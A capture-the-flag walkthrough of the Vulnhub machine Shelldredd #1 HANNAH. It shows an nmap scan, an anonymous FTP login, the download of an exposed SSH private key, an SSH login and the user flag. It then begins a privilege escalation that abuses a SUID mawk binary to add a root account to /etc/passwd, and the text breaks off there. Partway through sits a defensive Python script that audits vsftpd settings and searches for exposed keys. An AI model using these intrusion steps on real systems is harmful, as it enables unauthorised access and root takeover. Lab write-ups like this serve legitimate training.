Today we are going to hack the Vulnhub machine called
Shelldredd #1 HANNAH. You can download it from the following link:
HANNAH
Enumeration
We start with an nmap scan to see which ports it has open.
~ > nmap -A -p- 192.168.1.108
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 10:58 CEST
Nmap scan report for 192.168.1.108
Host is up (0.00035s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.59
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:2d:21:0c:2f:af:9d:5a:7b:3e:a4:27:aa:37:89:08 (RSA)
| 256 59:26:da:44:3b:97:d2:30:b1:9b:9b:02:74:8b:87:58 (ECDSA)
|_ 256 8e:ad:10:4f:e3:3e:65:28:40:cb:5b:bf:1d:24:7f:17 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds
After scanning the ports we see that it only has the FTP and SSH services.
We connect to the FTP using anonymous/anonymous to see what we can find...
~ > ftp 192.168.1.108
Connected to 192.168.1.108.
220 (vsFTPd 3.0.3)
Name (192.168.1.108:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 .
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 ..
drwxr-xr-x 2 0 0 4096 Aug 06 16:54 .hannah
226 Directory send OK.
ftp>
ftp> cd .hannah
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Aug 06 16:54 .
drwxr-xr-x 3 0 115 4096 Aug 06 16:56 ..
-rwxr-xr-x 1 0 0 1823 Aug 06 16:54 id_rsa
226 Directory send OK.
We see that inside .hannah there is an id_rsa file. We download it.
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1823 bytes).
226 Transfer complete.
1823 bytes received in 0.00 secs (1.6495 MB/s)
It looks like an SSH key, so we try to log in as hannah using that key.
~ > chmod 600 id_rsa
~ > ssh hannah@192.168.1.108 -i id_rsa -p 61000
The authenticity of host '[192.168.1.108]:61000 ([192.168.1.108]:61000)' can't be established.
ECDSA key fingerprint is SHA256:ceHZU8u3GwiQwVwrN4Ci830AmTvAmIUOlLjtVYcP2KM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.1.108]:61000' (ECDSA) to the list of known hosts.
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 5 09:20:42 2020 from 192.168.1.140
hannah@ShellDredd:~$
We're in :)
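Seen from the defender's side, the foothold above needed two things: anonymous FTP on a plaintext vsftpd, and a private key sitting in a hidden directory of the share. The following script is an added example (not part of the walkthrough and not the machine's own configuration) that audits a vsftpd.conf for those settings and walks an FTP root, dotfiles included, looking for PEM private-key headers. The config fragments and the share it builds under a temporary directory are constructed for the demo; the vsftpd option names and defaults are the upstream ones from vsftpd.conf(5).

```python
"""Defender-side audit for the two conditions that gave the foothold above:
anonymous FTP on a plaintext vsftpd, and a private key sitting in a hidden
directory of the share. Added example, not from the walkthrough."""
import os
import re
import tempfile

# Constructed vsftpd.conf fragments (hypothetical, not the target's config).
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
local_enable=YES
write_enable=NO
ssl_enable=NO
"""

HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
chroot_local_user=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""


def parse_vsftpd_conf(text):
    """Map option -> value for key=value lines; comments and blanks are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def is_yes(conf, key, default):
    """vsftpd booleans are YES/NO; 'default' is the upstream default when unset."""
    return conf.get(key, default).upper() == "YES"


def audit_vsftpd(text):
    """Return human-readable findings for the weak settings seen in the scan."""
    conf = parse_vsftpd_conf(text)
    findings = []
    if is_yes(conf, "anonymous_enable", "YES"):
        findings.append("anonymous_enable=YES: anyone can log in as ftp/anonymous")
        if is_yes(conf, "anon_upload_enable", "NO") or is_yes(conf, "anon_mkdir_write_enable", "NO"):
            findings.append("anonymous users can write to the share")
    if not is_yes(conf, "ssl_enable", "NO"):
        findings.append("ssl_enable=NO: control and data connections are plaintext")
    if is_yes(conf, "local_enable", "NO") and not is_yes(conf, "chroot_local_user", "NO"):
        findings.append("local users are not chrooted to their home directories")
    return findings


PRIVATE_KEY_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")


def find_exposed_private_keys(root):
    """Walk the FTP root, dotfiles included, and list files with a PEM private-key header."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)  # headers sit at the top of the file
            except OSError:
                continue
            if PRIVATE_KEY_RE.search(head):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo_share():
    """Build a constructed share with a hidden .hannah/id_rsa and audit it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, ".hannah"))
    with open(os.path.join(root, ".hannah", "id_rsa"), "wb") as fh:
        fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed, not a real key\n"
                 b"-----END OPENSSH PRIVATE KEY-----\n")
    with open(os.path.join(root, "README"), "w") as fh:
        fh.write("public files only\n")
    return find_exposed_private_keys(root)


if __name__ == "__main__":
    for finding in audit_vsftpd(WEAK_CONF):
        print("weak config:", finding)
    print("hardened config findings:", audit_vsftpd(HARDENED_CONF))
    print("private keys on share:", demo_share())
```

On a real host you would feed `audit_vsftpd` the contents of /etc/vsftpd.conf and point `find_exposed_private_keys` at the anonymous root (by default the home of the ftp user); the `ls -la` in the walkthrough is exactly why the walk does not skip dotfiles.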
user.txt
hannah@ShellDredd:~$ ls
user.txt
hannah@ShellDredd:~$ cat user.txt
Gr3mMhbCpuwxCZorqDL3ILPn
Privilege Escalation
We explore the system to see if we can find any SUID binary
that could help us with privilege escalation.
We see that "mawk" is there, which we can use...
We are going to create a user in the /etc/passwd file with root
permissions, with the help of mawk.
The password our user will use is "123", so we prepare its hash
to put it in our file.
~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1
Once we have the password we want to use, we use mawk to add a line
to the /etc/passwd file with the user that will have root privileges
and that we will use!